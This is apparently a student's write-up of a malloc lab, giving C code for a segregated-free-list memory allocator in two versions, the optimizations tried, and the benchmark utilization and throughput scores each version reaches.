static size_t find_segidx(size_t size)
{
    if (size <= 16)
        return 0;

    if (size > 1 << 22)
        return 19;

    size_t mask, seg_idx = 0;
    size_t x = size - 1;
    
    mask = x & 0xFFFF0000;
    seg_idx = seg_idx + !!mask * 16;
    x = x >> (!!mask * 16);
    
    mask = x & 0x0000FF00;
    seg_idx = seg_idx + !!mask * 8;
    x = x >> (!!mask * 8);
    
    mask = x & 0x000000F0;
    seg_idx = seg_idx + !!mask * 4;
    x = x >> (!!mask * 4);

    mask = x & 0x0000000C;
    seg_idx = seg_idx + !!mask * 2;
    x = x >> (!!mask * 2);

    mask = x & 0x00000002;
    seg_idx = seg_idx + !!mask * 1;
    x = x >> (!!mask * 1);

    mask = x & 0x00000001;
    seg_idx = seg_idx + !!mask;

    return MAX(0, seg_idx - 4);
}

static size_t insert_freeblock(void* bp)
{
    size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));
    void* nxtp = head_seglp[seg_idx];

    head_seglp[seg_idx] = bp;
    PUT_PRVP(bp, NULL);
    PUT_NXTP(bp, nxtp);
    if (nxtp != NULL)
        PUT_PRVP(nxtp, bp);

    return seg_idx;
}

static void delete_freeblock(void* bp)
{
    size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));
    void* prvp = GET_PRVP(bp);
    void* nxtp = GET_NXTP(bp);
    if (prvp != NULL) PUT_NXTP(prvp, nxtp);
    if (nxtp != NULL) PUT_PRVP(nxtp, prvp);
    if (head_seglp[seg_idx] == bp)
        head_seglp[seg_idx] = nxtp;
}

static void set_nextblock_alloc_prev(void* bp, size_t value)
{
    bp = NEXT_BLKP(bp);
    PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), value, GET_ALLOC(HDRP(bp))));
}


// This function returns the prev free block in the same seg list as `bp`
static void* coalesce(void *bp)
{
    size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
    size_t size = GET_SIZE(HDRP(bp));
    size_t seg_idx = find_segidx (size);

    if (prev_alloc && next_alloc) {  }

    else if (prev_alloc && !next_alloc) {
        void* nxtp = NEXT_BLKP(bp);
        void* prev_freep = GET_PRVP(bp);

        // Make sure the prev free block is not the ones we're coalescing
        if (prev_freep == nxtp)
            prev_freep = GET_PRVP(prev_freep);

        delete_freeblock(bp);
        delete_freeblock(nxtp);
        size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
        PUT(HDRP(bp), PACK(size, 1 << 1, 0));
        PUT(FTRP(bp), PACK(size, 1 << 1, 0));
        size_t new_segidx = insert_freeblock(bp); 
        
        // Set bp that will be returned to ensure it's still in the same seg list
        if (new_segidx == seg_idx || prev_freep == NULL) {
            bp = head_seglp[seg_idx];
        } else {
            bp = prev_freep;
        } 
    }

    else if (!prev_alloc && next_alloc) {
        void* nxtp = bp;
        void* prev_freep = GET_PRVP(bp);
        bp = PREV_BLKP(bp);

        // Make sure the prev free block is not the ones we're coalescing
        if (prev_freep == bp) {
            prev_freep = GET_PRVP(prev_freep);
        }

        delete_freeblock(bp);
        delete_freeblock(nxtp);
        size += GET_SIZE(HDRP(bp));
        PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
        PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
        size_t new_segidx = insert_freeblock(bp);

        if (new_segidx == seg_idx || prev_freep == NULL) {
            bp = head_seglp[seg_idx];
        } else {
            bp = prev_freep;
        }
    }

    else {
        size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(HDRP(NEXT_BLKP(bp)));
        void* nxtp = bp;
        void* nnxtp = NEXT_BLKP(bp);
        void* prev_freep = GET_PRVP(bp);
        bp = PREV_BLKP(bp);

        // Make sure the prev free block is not the ones we're coalescing
        while (prev_freep == bp || prev_freep == nnxtp) {
            prev_freep = GET_PRVP(prev_freep);
        }

        delete_freeblock(bp);
        delete_freeblock(nxtp);
        delete_freeblock(nnxtp);
        PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
        PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
        size_t new_segidx = insert_freeblock(bp);

        if (new_segidx == seg_idx || prev_freep == NULL) {
            bp = head_seglp[seg_idx];
        } else {
            bp = prev_freep;
        }
    } 

    return bp;
}

static void* find_fit_better_hit_seglist_deferred(size_t asize)
{
    size_t seg_idx = find_segidx(asize);
    void* bp;
    void* best_bp = NULL;
    void* best_size = 0;
    const int iteration = 100;
    
    while (seg_idx < N_SEGLIST) {
        bp = head_seglp[seg_idx];
        while (bp != NULL) {
            if (!GET_ALLOC(HDRP(NEXT_BLKP(bp))) || !GET_ALLOC_PREV(HDRP(bp))) {
                bp = coalesce(bp);
                continue;
            }
            if (asize <= GET_SIZE(HDRP(bp))) {
                best_bp = bp;
                best_size = GET_SIZE(HDRP(bp));
                break;
            }
            bp = GET_NXTP(bp);
        }
        if (best_bp != NULL)
            break;
        seg_idx++;
    }

    return best_bp;

    if (best_bp == NULL || seg_idx == N_SEGLIST) 
        return NULL;

    size_t i = 0;
    while (i < iteration && bp != NULL) {
        // Coalesce
        while (!GET_ALLOC(HDRP(NEXT_BLKP(bp))) || !GET_ALLOC_PREV(HDRP(bp))) {
            bp = coalesce(bp);
            continue;
        }

        // Check if it's better
        ++i;
        if (asize <= GET_SIZE(HDRP(bp)) && GET_SIZE(HDRP(bp)) < best_size) {
            best_bp = bp;
            best_size = GET_SIZE(HDRP(bp));
        }

        // Next free block
        bp = GET_NXTP(bp);
    }

    return best_bp;
}

static void* find_fit(size_t asize)
{
    void* bp = find_fit_better_hit_seglist_deferred(asize);
    return bp;
}

static void place(void* bp, size_t asize)
{
    size_t csize = GET_SIZE(HDRP(bp));
    if (csize >= asize + 2 * DWORD) {
        delete_freeblock(bp);
        PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
        bp = NEXT_BLKP(bp);
        PUT(HDRP(bp), PACK(csize - asize, 1 << 1, 0));
        PUT(FTRP(bp), PACK(csize - asize, 1 << 1, 0));
        insert_freeblock(bp);
    }
    else {
        delete_freeblock(bp);
        PUT(HDRP(bp), PACK(csize, GET_ALLOC_PREV(HDRP(bp)), 1));
        set_nextblock_alloc_prev(bp, 1 << 1);
    }
}

static void* extend_heap(size_t words)
{
    char *bp;
    size_t size;

    size = (words % 2) ? (words + 1) * SWORD : words * SWORD;
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;
    size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
    PUT(HDRP(bp), PACK(size, prev_alloc, 0));
    PUT(FTRP(bp), PACK(size, prev_alloc, 0));
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 0, 1));
    
    insert_freeblock(bp);
    return bp;
}

/* 
 * mm_init - initialize the malloc package.
 */
int mm_init(void)
{
    void* bp;

    if ((heap_listp = mem_sbrk(4 * SWORD)) == (void *)-1)
        return -1;
    PUT(heap_listp, 0);
    PUT(heap_listp + 1 * SWORD, PACK(DWORD, 1 << 1, 1));
    PUT(heap_listp + 2 * SWORD, PACK(DWORD, 1 << 1, 1));
    PUT(heap_listp + 3 * SWORD, PACK(0, 1 << 1, 1));
    heap_listp += 2 * SWORD;
    
    for (int i = 0; i < N_SEGLIST; ++i)
        head_seglp[i] = NULL;

    if ((bp = extend_heap(CHUNKSIZE / SWORD)) == NULL)
        return -1;
    return 0;
}

/* 
 * mm_malloc - Allocate a block by incrementing the brk pointer.
 *     Always allocate a block whose size is a multiple of the alignment.
 */
void* mm_malloc(size_t size)
{
    size_t asize;
    size_t extendsize;
    char* bp;

    if (size == 0)
        return NULL;

    if (size <= 3 * SWORD)
        asize = 2 * DWORD;
    else
        asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);
    
    if ((bp = find_fit(asize)) != NULL) {
        place (bp, asize);
        return bp;
    }

    extendsize = MAX(asize, CHUNKSIZE);
    if ((bp = extend_heap(extendsize / SWORD)) == NULL)
       return NULL; 
    place(bp, asize);
    return bp;
}

/*
 * mm_free - Freeing a block does nothing.
 */
void mm_free(void *bp)
{
    size_t size = GET_SIZE(HDRP(bp));
    size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
    PUT(HDRP(bp), PACK(size, prev_alloc, 0));
    PUT(FTRP(bp), PACK(size, prev_alloc, 0));
    set_nextblock_alloc_prev(bp, 0);
    insert_freeblock(bp);
}

/*
 * mm_realloc - Implemented simply in terms of mm_malloc and mm_free
 */

void* mm_realloc(void* bp, size_t size)
{
    if (bp == NULL)
        return mm_malloc(size);

    if (size == 0) {
        mm_free(bp);
        return NULL;
    }

    size_t osize = GET_SIZE(HDRP(bp));
    size_t asize = size <= 3 * SWORD ? 2 * DWORD : DWORD * ((size + SWORD + DWORD - 1) / DWORD);

    if (osize >= asize + 2 * DWORD) {
        void* old_bp = bp;
        PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
        bp = NEXT_BLKP(bp);
        PUT(HDRP(bp), PACK(osize - asize, 1 << 1, 0));
        PUT(FTRP(bp), PACK(osize - asize, 1 << 1, 0));
        set_nextblock_alloc_prev(bp, 0);
        insert_freeblock(bp);
        return old_bp;
    }
    else if (osize >= asize) {
        return bp;
    }
    else {
        void* new_bp = mm_malloc(size);
        if (new_bp == NULL)
            return NULL;
        
        memcpy(new_bp, bp, osize - SWORD);
        mm_free(bp);
        return new_bp;
    }
}

and the score is...

trace  valid  util     ops      secs  Kops
 0       yes   99%    5694  0.000104 54540
 1       yes   99%    5848  0.000102 57333
 2       yes   99%    6648  0.000123 53917
 3       yes   99%    5380  0.000114 47028
 4       yes   40%   14400  0.000346 41667
 5       yes   92%    4800  0.000175 27491
 6       yes   90%    4800  0.000206 23346
 7       yes   52%   12000  0.000124 96852
 8       yes   51%   24000  0.000248 96774
 9       yes   20%   14401  0.027726   519
10       yes   31%   14401  0.000967 14889
11       yes   77%   57716  0.000616 93649
12       yes   51%  100000  0.001141 87665
13       yes   99%   20000  0.000283 70746
14       yes   71%  200400  0.003631 55193
15       yes   53%    6495  0.000077 83806
Total          70%  496983  0.035983 13811

Perf index = 42 (util) + 40 (thru) = 82/100

Excellent! We get a very decent score: a good score of utility and a full score of throughput. But there are still much room to improve utility.

Seglist + Immediate Coalesce + Better Hit + Mini Block + Realloc Optimization + Place Optimization

We did the following optimizations on top of the basic seglist:

Immediate Coalesce: Deferred coalescing does not seem to improve utility so a simpler immediate coalesce is employed.
Better Hit: Starting from the first hit we further search the next 100 free blocks and choose the most fittable one.
Mini Block: Shrink the minimum block size to 8 bytes rather than 16 bytes. This can be achieved by introducing an extra bit to store whether the previous block is a mini block. This is applied for both free blocks and allocated blocks.
Realloc Optimization: If we cannot find an existing free block during reallocation, and at the same time the block reallocated lies at the end of the heap, we then extend the size we need rather than the full size. For example, if the current block occupies 800 bytes and the new size is 960 bytes, we only need to extend the heap for 160 bytes, not 960 bytes.
Place Optimization: When splitting a free block, we place the allocated block at the end of the free block if it's size is larger than a threshold (set to 64 by default) and place it at the front otherwise. This sometimes helps coalesce and reduce fragmentation.

Experiments show that the last two techniques are critical to improve utility whereas the first three have marginal effects.

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
    /* Team name */
    "Goodbye",
    /* First member's full name */
    "Sulley",
    /* First member's email address */
    "sulley@cs.cmu.edu",
    /* Second member's full name (leave blank if none) */
    "AnotherSulley",
    /* Second member's email address (leave blank if none) */
    "anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define DWORD 8
#define SWORD 4

/* rounds up to the nearest multiple of DWORD */
#define ALIGN(size) (((size) + (DWORD-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<9)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))
#define MIN(x, y) ((x) < (y) ? (x) : (y))

/* Pack a size and allocated bits into a word */
#define PACK(size, prev_mini, prev_alloc, alloc) ((size) | (prev_mini) | (prev_alloc) | (alloc))

/* Read and write a double word at address p */
#define GET(p)      (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p)       (GET(p) & ~0x7)
#define GET_ALLOC(p)      (GET(p) & 0x1)
#define GET_PREV_ALLO(p)  (GET(p) & 0x2)
#define GET_PREV_MINI(p)  (GET(p) & 0x4)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp)  ((char *)(bp) - SWORD)
#define FTRP(bp)  ((char *)(bp) + GET_SIZE(HDRP(bp)) - DWORD)

/* Get and set a free block's next/prev pointer value */
#define GET_PRVP(bp)     (*((unsigned int*)(bp) + 1))
#define GET_NXTP(bp)     (*(unsigned int*)(bp))
#define PUT_PRVP(bp, v)  (*((unsigned int*)(bp) + 1) = (v))
#define PUT_NXTP(bp, v)  (*(unsigned int*)(bp) = (v))


/* Given block ptr bp, compute address of next and previous qblocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DWORD)))

#define N_SEGLIST 21

const unsigned int lower_seg[N_SEGLIST] = { 0, 1 << 3, 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22 };
const unsigned int upper_seg[N_SEGLIST] = { 1 << 3, 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22, 1 << 32 - 1 };
static char* head_seglp[N_SEGLIST];
static char* heap_listp = NULL;

static size_t find_segidx(size_t size)
{
    if (size <= 8)
        return 0;

    if (size > 1 << 22)
        return 20;

    size_t mask, seg_idx = 0;
    size_t x = size - 1;
    
    mask = x & 0xFFFF0000;
    seg_idx = seg_idx + !!mask * 16;
    x = x >> (!!mask * 16);
    
    mask = x & 0x0000FF00;
    seg_idx = seg_idx + !!mask * 8;
    x = x >> (!!mask * 8);
    
    mask = x & 0x000000F0;
    seg_idx = seg_idx + !!mask * 4;
    x = x >> (!!mask * 4);

    mask = x & 0x0000000C;
    seg_idx = seg_idx + !!mask * 2;
    x = x >> (!!mask * 2);

    mask = x & 0x00000002;
    seg_idx = seg_idx + !!mask * 1;
    x = x >> (!!mask * 1);

    mask = x & 0x00000001;
    seg_idx = seg_idx + !!mask;

    return MAX(0, seg_idx - 3);
}

static size_t insert_freeblock(void* bp)
{
    size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));
    void* nxtp = head_seglp[seg_idx];

    // Mini block, using LIFO
    if (seg_idx == 0) {
        head_seglp[0] = bp;
        PUT_NXTP(bp, nxtp);
        return 0;
    }

    if (nxtp == NULL) {
        head_seglp[seg_idx] = bp;
        PUT_PRVP(bp, NULL);
        PUT_NXTP(bp, NULL);
    }
    else {
        void* curp = nxtp;
        nxtp = GET_NXTP(nxtp);
        while (nxtp != NULL && nxtp < bp) {
            curp = nxtp;
            nxtp = GET_NXTP(nxtp);
        }
        if (nxtp == NULL) {
            PUT_NXTP(curp, bp);
            PUT_PRVP(bp, curp);
            PUT_NXTP(bp, NULL);
        }
        else {
            PUT_NXTP(curp, bp);
            PUT_PRVP(bp, curp);
            PUT_NXTP(bp, nxtp);
            PUT_PRVP(nxtp, bp);
        }
    }

    return seg_idx;
}

static void delete_freeblock(void* bp)
{
    size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));

    // Mini block
    if (seg_idx == 0) {
        if (head_seglp[0] == bp) {
            head_seglp[0] = GET_NXTP(bp);
        }
        else {
            void* curp = head_seglp[0];
            void* nxtp = GET_NXTP(curp);
            while (!(nxtp == bp)) {
                curp = nxtp;
                nxtp = GET_NXTP(nxtp);
            }
            PUT_NXTP(curp, GET_NXTP(nxtp));
        }
        return;
    }

    void* prvp = GET_PRVP(bp);
    void* nxtp = GET_NXTP(bp);
    if (prvp != NULL) PUT_NXTP(prvp, nxtp);
    if (nxtp != NULL) PUT_PRVP(nxtp, prvp);
    if (head_seglp[seg_idx] == bp)
        head_seglp[seg_idx] = nxtp;
}

static void set_nextblock_alloc_prev(void* bp, size_t value)
{
    bp = NEXT_BLKP(bp);
    PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), GET_PREV_MINI(HDRP(bp)), value, GET_ALLOC(HDRP(bp))));
}

static void set_nextblock_mini_prev(void* bp, size_t mini)
{
    bp = NEXT_BLKP(bp);
    PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), mini, GET_PREV_ALLO(HDRP(bp)), GET_ALLOC(HDRP(bp))));
}

static void* coalesce(void *bp)
{
    size_t prev_alloc = GET_PREV_ALLO(HDRP(bp));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
    size_t size = GET_SIZE(HDRP(bp));

    if (prev_alloc && next_alloc) {  }

    else if (prev_alloc && !next_alloc) {
        void* nxtp = NEXT_BLKP(bp);
        set_nextblock_mini_prev(nxtp, 0);
        delete_freeblock(bp);
        delete_freeblock(nxtp);
        size += GET_SIZE(HDRP(nxtp));
        PUT(HDRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), 1 << 1, 0));
        PUT(FTRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), 1 << 1, 0));
        insert_freeblock(bp); 
    }

    else if (!prev_alloc && next_alloc) {
        set_nextblock_mini_prev(bp, 0);
        void* nxtp = bp;
        bp = GET_PREV_MINI(HDRP(bp)) ? bp - DWORD : PREV_BLKP(bp);
        delete_freeblock(bp);
        delete_freeblock(nxtp);
        size += GET_SIZE(HDRP(bp));
        PUT(HDRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
        PUT(FTRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
        insert_freeblock(bp);
    }

    else {
        void* nxtp = bp;
        void* nnxtp = NEXT_BLKP(bp);
        set_nextblock_mini_prev(nnxtp, 0);
        bp = GET_PREV_MINI(HDRP(bp)) ? bp - DWORD : PREV_BLKP(bp);
        delete_freeblock(bp);
        delete_freeblock(nxtp);
        delete_freeblock(nnxtp);
        size += GET_SIZE(HDRP(bp)) + GET_SIZE(HDRP(nnxtp));
        PUT(HDRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
        PUT(FTRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
        insert_freeblock(bp);
    } 

    return bp;
}

// Coalesce neighboring free blocks (if any) for realloc.
static void* coalesce_realloc(void* bp)
{
    size_t size = GET_SIZE(HDRP(bp));

    // Merge following free blocks
    void* current_bp = bp;
    while (!GET_ALLOC(HDRP(NEXT_BLKP(current_bp)))) {
        current_bp = NEXT_BLKP(current_bp);
        delete_freeblock(current_bp);
        size += GET_SIZE(HDRP(current_bp));
    }

    // Merge prior free blocks
    current_bp = bp;
    size_t prev_alloc = GET_PREV_ALLO(HDRP(current_bp));
    while (!prev_alloc) {
        current_bp = GET_PREV_MINI(HDRP(bp)) ? current_bp - DWORD : PREV_BLKP(current_bp);
        delete_freeblock(current_bp);
        size += GET_SIZE(HDRP(current_bp));
        prev_alloc = GET_PREV_ALLO(HDRP(current_bp));
    }
    
    PUT(HDRP(current_bp), PACK(size, GET_PREV_MINI(HDRP(bp)), prev_alloc, 0));
    size_t mini = size > DWORD ? 0 : 1 << 2;
    set_nextblock_mini_prev(current_bp, mini);

    return current_bp;
}

static void* find_fit_better_hit_seglist_immediate(size_t asize)
{
    size_t seg_idx = find_segidx(asize);
    void* bp;
    void* best_bp = NULL;
    size_t best_size = 0;
    const int iteration = 100;
    
    // Mini block
    if (seg_idx == 0) {
        bp = head_seglp[0];
        if (bp != NULL)
            return bp;
        else
            seg_idx = 1;
    }
    
    while (seg_idx < N_SEGLIST) {
        bp = head_seglp[seg_idx];
        while (bp != NULL) {
            if (asize <= GET_SIZE(HDRP(bp))) {
                best_bp = bp;
                best_size = GET_SIZE(HDRP(bp));
                break;
            }
            bp = GET_NXTP(bp);
        }
        if (best_bp != NULL)
            break;
        seg_idx++;
    }

    if (best_bp == NULL || seg_idx == N_SEGLIST) 
        return NULL;

    size_t i = 0;
    while (i < iteration && bp != NULL) {
        if (asize <= GET_SIZE(HDRP(bp)) && GET_SIZE(HDRP(bp)) < best_size) {
            best_bp = bp;
            best_size = GET_SIZE(HDRP(bp));
        }
        bp = GET_NXTP(bp);
        ++i;
    }
    
    return best_bp;
}

static void* find_fit(size_t asize)
{
    void* bp = find_fit_better_hit_seglist_immediate(asize);
    return bp;
}

static void* place_threshold(void* bp, size_t csize, size_t asize, const size_t threshold)
{
    if (asize > threshold) {
        size_t mini = (csize - asize > DWORD) ? 0 : 1 << 2;
        if (mini) {
            PUT(HDRP(bp), PACK(csize - asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
        }
        else {
            PUT(HDRP(bp), PACK(csize - asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
            PUT(FTRP(bp), PACK(csize - asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
        }
        insert_freeblock(bp);
        bp = NEXT_BLKP(bp);
        PUT(HDRP(bp), PACK(asize, mini, 0, 1));
        set_nextblock_alloc_prev(bp, 1 << 1);
    }
    else {
        void* v_bp = bp;
        size_t amini = asize > DWORD ? 0 : 1 << 2;
        size_t cmini = (csize - asize > DWORD) ? 0 : 1 << 2;
        PUT(HDRP(bp), PACK(asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 1));
        bp = NEXT_BLKP(bp);
        if (cmini) {
            PUT(HDRP(bp), PACK(csize - asize, amini, 1 << 1, 0));
        }
        else {
            PUT(HDRP(bp), PACK(csize - asize, amini, 1 << 1, 0));
            PUT(FTRP(bp), PACK(csize - asize, amini, 1 << 1, 0));
        }
        insert_freeblock(bp);
        set_nextblock_mini_prev(bp, cmini);
        bp = v_bp;
    }

    return bp;
}

static void* place_threshold_realloc(void* bp, void* n_bp, size_t fsize, size_t asize, size_t psize, const size_t threshold)
{
    // Be CAREFUL of the instruction order: memcpy > PUT
    if (asize > threshold) {
        void* m_bp = n_bp;
        size_t mini = (fsize - asize > DWORD) ? 0 : 1 << 2;
        PUT(HDRP(n_bp), PACK(fsize - asize, GET_PREV_MINI(HDRP(n_bp)), GET_PREV_ALLO(HDRP(n_bp)), 0));
        n_bp = NEXT_BLKP(n_bp);
        memcpy(n_bp, bp, psize);
        PUT(HDRP(n_bp), PACK(asize, mini, 0, 1));
        set_nextblock_mini_prev(n_bp, 0);
        set_nextblock_alloc_prev(n_bp, 1 << 1);
        if (!mini) 
            PUT(FTRP(m_bp), PACK(fsize - asize, GET_PREV_MINI(HDRP(m_bp)), GET_PREV_ALLO(HDRP(m_bp)), 0));
        insert_freeblock(m_bp);
    }
    else {
        size_t amini = asize > DWORD ? 0 : 1 << 2;
        size_t fmini = (fsize - asize > DWORD) ? 0 : 1 << 2;
        PUT(HDRP(n_bp), PACK(asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(n_bp)), 1));
        memcpy(n_bp, bp, psize);
        bp = n_bp;
        n_bp = NEXT_BLKP(n_bp);
        if (fmini) {
            PUT(HDRP(n_bp), PACK(fsize - asize, amini, 1 << 1, 0));
        } 
        else {
            PUT(HDRP(n_bp), PACK(fsize - asize, amini, 1 << 1, 0));
            PUT(FTRP(n_bp), PACK(fsize - asize, amini, 1 << 1, 0));
        }
        set_nextblock_mini_prev(n_bp, fmini);
        set_nextblock_alloc_prev(n_bp, 0);
        insert_freeblock(n_bp);
        n_bp = bp;
    }

    return n_bp;
}

static void* place(void* bp, size_t asize)
{
    size_t csize = GET_SIZE(HDRP(bp));
    delete_freeblock(bp);

    // Normal block
    if (csize >= asize + DWORD) {
        bp = place_threshold(bp, csize, asize, 64);
    }
    // No split
    else {
        PUT(HDRP(bp), PACK(csize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 1));
        set_nextblock_alloc_prev(bp, 1 << 1);
        set_nextblock_mini_prev(bp, csize > DWORD ? 0 : 1 << 2);
    }

    return bp;
}

static void* extend_heap(size_t words)
{
    char *bp;
    size_t size;
    size = (words % 2) ? (words + 1) * SWORD : words * SWORD;
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;
    size_t prev_alloc = GET_PREV_ALLO(HDRP(bp));
    size_t prev_mini = GET_PREV_MINI(HDRP(bp));
    PUT(HDRP(bp), PACK(size, prev_mini, prev_alloc, 0));
    PUT(FTRP(bp), PACK(size, prev_mini, prev_alloc, 0));
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 0, 0, 1));
    insert_freeblock(bp);
    return coalesce(bp);
}

/* 
 * mm_init - initialize the malloc package.
 */
int mm_init(void)
{
    void* bp;

    if ((heap_listp = mem_sbrk(4 * SWORD)) == (void *)-1)
        return -1;
    PUT(heap_listp, 0);
    PUT(heap_listp + 1 * SWORD, PACK(DWORD, 1 << 2, 1 << 1, 1));
    PUT(heap_listp + 2 * SWORD, PACK(DWORD, 1 << 2, 1 << 1, 1));
    PUT(heap_listp + 3 * SWORD, PACK(0, 1 << 2, 1 << 1, 1));
    heap_listp += 2 * SWORD;
    
    for (int i = 0; i < N_SEGLIST; ++i)
        head_seglp[i] = NULL;
    
    if ((bp = extend_heap(CHUNKSIZE / SWORD)) == NULL)
        return -1;
    return 0;
}

/* 
 * mm_malloc - Allocate a block by incrementing the brk pointer.
 *     Always allocate a block whose size is a multiple of the alignment.
 */
void* mm_malloc(size_t size)
{
    size_t asize;
    size_t extendsize;
    char* bp;

    if (size == 0)
        return NULL;

    asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);

    if ((bp = find_fit(asize)) != NULL) {
        return place (bp, asize);
    }
    
    extendsize = MAX(asize, CHUNKSIZE);
    if ((bp = extend_heap(extendsize / SWORD)) == NULL)
       return NULL; 
    return place(bp, asize);
}

/*
 * mm_free - Freeing a block does nothing.
 */
void mm_free(void *bp)
{
    size_t size = GET_SIZE(HDRP(bp));
    size_t mini = size > DWORD ? 0 : 1 << 2;
    size_t prev_alloc = GET_PREV_ALLO(HDRP(bp));
    size_t prev_mini = GET_PREV_MINI(HDRP(bp));
    PUT(HDRP(bp), PACK(size, prev_mini, prev_alloc, 0));
    if (!mini)
        PUT(FTRP(bp), PACK(size, prev_mini, prev_alloc, 0));
    set_nextblock_alloc_prev(bp, 0);
    set_nextblock_mini_prev(bp, mini);
    insert_freeblock(bp);
    coalesce(bp);
}

/*
 * mm_realloc - Implemented simply in terms of mm_malloc and mm_free
 */

void* mm_realloc(void* bp, size_t size)
{
    if (bp == NULL)
        return mm_malloc(size);

    if (size == 0) {
        mm_free(bp);
        return NULL;
    }

    size_t osize = GET_SIZE(HDRP(bp));
    size_t asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);
    size_t psize = MIN(osize, asize) - SWORD;
    
    void* new_bp = coalesce_realloc(bp);
    size_t fsize = GET_SIZE(HDRP(new_bp));

    // Block capacity not enough for realloc
    if (fsize < asize) {
        // Next block is epilogue, extend only the size you need
        if (!GET_SIZE(HDRP(NEXT_BLKP(new_bp)))) {
            if ((long)mem_sbrk(asize - fsize) == -1)
                return NULL;
            PUT(HDRP(new_bp), PACK(asize, GET_PREV_MINI(HDRP(new_bp)), GET_PREV_ALLO(HDRP(new_bp)), 1));
            memcpy(new_bp, bp, psize);
            PUT(HDRP(NEXT_BLKP(new_bp)), PACK(0, 0, 1, 1));
            return new_bp;
        }
        else {
            void* m_bp = mm_malloc(size);
            if (m_bp == NULL) 
                return NULL;
            memcpy(m_bp, bp, psize);
            mm_free(new_bp);
            return m_bp;
        }
    }
    else if (fsize >= asize + DWORD) {  
        return place_threshold_realloc(bp, new_bp, fsize, asize, psize, 64);
    }
    else {
        PUT(HDRP(new_bp), PACK(fsize, GET_PREV_MINI(HDRP(new_bp)), GET_PREV_ALLO(HDRP(new_bp)), 1));
        memcpy(new_bp, bp, psize);
        set_nextblock_alloc_prev(new_bp, 1 << 1);
        set_nextblock_mini_prev(new_bp, fsize > DWORD ? 0 : 1 << 1);
        return new_bp;
    }
}

What about this time for our cute score?

trace  valid  util     ops      secs  Kops
 0       yes   99%    5694  0.000162 35235
 1       yes  100%    5848  0.000192 30427
 2       yes   99%    6648  0.000184 36091
 3       yes  100%    5380  0.000141 38048
 4       yes   94%   14400  0.000262 54983
 5       yes   94%    4800  0.000325 14769
 6       yes   94%    4800  0.000311 15449
 7       yes   87%   12000  0.004518  2656
 8       yes   74%   24000  0.011462  2094
 9       yes  100%   14401  0.018781   767
10       yes   99%   14401  0.001136 12683
11       yes   78%   57716  0.159908   361
12       yes   78%  100000  0.316146   316
13       yes   99%   20000  0.000295 67912
14       yes   70%  200400  0.009781 20490
15       yes   58%    6495  0.002252  2884
Total          89%  496983  0.525856   945

Perf index = 53 (util) + 40 (thru) = 93/100

